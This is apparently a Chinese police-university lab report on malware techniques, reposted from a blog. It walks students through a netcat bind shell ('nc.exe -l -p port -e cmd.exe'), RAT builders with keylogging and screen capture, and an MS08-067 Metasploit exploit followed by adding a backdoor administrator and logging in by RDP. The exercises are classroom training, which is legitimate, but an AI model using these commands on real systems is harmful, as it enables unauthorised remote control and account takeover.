实验四 恶意代码技术
學???號201421460014
中國人民公安大學
Chinese people’?public security university
?
網絡對抗技術
實驗報告
?
| 實驗四 |
| 惡意代碼技術 |
?
?
?
| 學生姓名 | 景偉陽 |
| 年級 | 2014級? |
| 區隊 | ?六區隊 |
| 指導教師 | ?高見? ? |
信息技術與網絡安全學院
2016年11月7日
?
實驗任務總綱
2016—2017?學年?第?一?學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。
?
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬件和軟件環境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統和啟動工具軟件環境。
2)用軟件工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
?
任務一 利用NC控制電腦
?
?NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
?
實驗過程需要兩個同學相互配合完成:
?
步驟一:
?
???在受害者的機器 (同學A)
輸入下面的命令:
nc.exe?-l -p port -e cmd.exe ??進入監聽模式
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip??port //連接victim_IP,然后得到一個shell。?(需要截圖)
步驟三:
?
在shell中,利用net user?用戶名 密碼?/add?,添加一個用戶,并在受害者的機器中使用?net user命令進行驗證。(需要截圖)
任務二 利用木馬控制電腦
?
實驗過程需要兩個同學配合:
?
步驟一:
?
??? 攻擊者的機器. (同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。
?步驟二:
?
點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。
1.文件管理,嘗試拷貝文件
2.屏幕控制,嘗試獲取桌面
3.鍵盤記錄,嘗試獲取對方擊鍵記錄
4.會話管理,重啟對方機器,查看是否能自啟動上線
任務三 通過漏洞獲取shell(合天平臺中做)?所有過程截圖寫博客
?windows ms08067 漏洞利用
在平臺中獲取shell之后,繼續利用攻擊機器使用
net user user pass /add
net localgroup administrators /add
命令向被攻擊的機器中添加賬戶,并提升為管理員
然后用rdesktop 10.1.1.130 登陸對方的遠程桌面
?
關閉xp系統主機的防火墻
查看攻擊主機的ip地址和賬戶
啟動Armitage
檢索10.1.1.0/24網段
對130進行檢測
搜尋到適應的攻擊模塊
?配置攻擊信息
利用Metasploit shall獲得xp主機的管理員權限
利用cmd shall建立attacker的賬戶
利用rdesktop遠程登錄xp系統的attacker(密碼:123465)
?
轉載于:https://www.cnblogs.com/P201421460014/p/7751078.html
總結
以上是生活随笔為你收集整理的实验四 恶意代码技术的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: LS-DYNA常用关键字
- 下一篇: Cannot find module '